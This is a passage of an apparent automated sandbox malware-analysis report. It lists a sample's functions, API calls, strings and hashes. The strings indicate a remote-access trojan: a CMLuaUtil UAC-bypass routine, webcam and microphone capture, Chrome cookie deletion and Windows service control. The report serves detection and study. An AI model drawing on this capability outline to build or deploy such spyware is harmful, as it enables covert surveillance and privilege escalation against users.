                                                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                          Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                          • int.LIBCPMT ref: 004111BE
                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                          • String ID: (mG
                                                                                          • API String ID: 2536120697-4059303827
                                                                                          • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                          • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                          • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                          • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                          Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                          Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe), ref: 0040760B
                                                                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                          • CoUninitialize.OLE32 ref: 00407664
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                                                          • String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                          • API String ID: 3851391207-1649178345
                                                                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                          Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                          • GetLastError.KERNEL32 ref: 0040BB22
                                                                                          Strings
                                                                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                          • UserProfile, xrefs: 0040BAE8
                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                          • API String ID: 2018770650-304995407
                                                                                          • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                          • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                          Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __allrem.LIBCMT ref: 0043ACE9
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                          • __allrem.LIBCMT ref: 0043AD1C
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                          • __allrem.LIBCMT ref: 0043AD51
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1992179935-0
                                                                                          • Opcode ID: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                          • Opcode Fuzzy Hash: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                          Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prologSleep
                                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                          • API String ID: 3469354165-3054508432
                                                                                          • Opcode ID: 4e7d72cfb869cbd4a3cca5645b8252f5b7393d96b6abf356dbd6ddaa2dec30c4
                                                                                          • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                          • Opcode Fuzzy Hash: 4e7d72cfb869cbd4a3cca5645b8252f5b7393d96b6abf356dbd6ddaa2dec30c4
                                                                                          • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                          Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                          • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3950776272-0
                                                                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                          Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __cftoe
                                                                                          • String ID:
                                                                                          • API String ID: 4189289331-0
                                                                                          • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                          • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                          Function 0040A761 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                          • String ID:
                                                                                          • API String ID: 3795512280-0
                                                                                          • Opcode ID: 878f6ea5af70e8d299457992e433038a7ecef4d13d6e9d58e6633a4d30a966b5
                                                                                          • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                          • Opcode Fuzzy Hash: 878f6ea5af70e8d299457992e433038a7ecef4d13d6e9d58e6633a4d30a966b5
                                                                                          • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                                          Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                          • String ID:
                                                                                          • API String ID: 493672254-0
                                                                                          • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                          • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                          Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                          • _free.LIBCMT ref: 004482CC
                                                                                          • _free.LIBCMT ref: 004482F4
                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                          • _abort.LIBCMT ref: 00448313
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                          Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                          Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                          Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                          Function 00456C9A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: @^E
                                                                                          • API String ID: 269201875-2908066071
                                                                                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                          Function 0040186A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                          • String ID: PkG$NG
                                                                                          • API String ID: 1649129571-2686071003
                                                                                          • Opcode ID: de5d16925772a287ebcfb4afa4ce91567f336408c558c247237889d51a2cceb0
                                                                                          • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                          • Opcode Fuzzy Hash: de5d16925772a287ebcfb4afa4ce91567f336408c558c247237889d51a2cceb0
                                                                                          • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                          Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
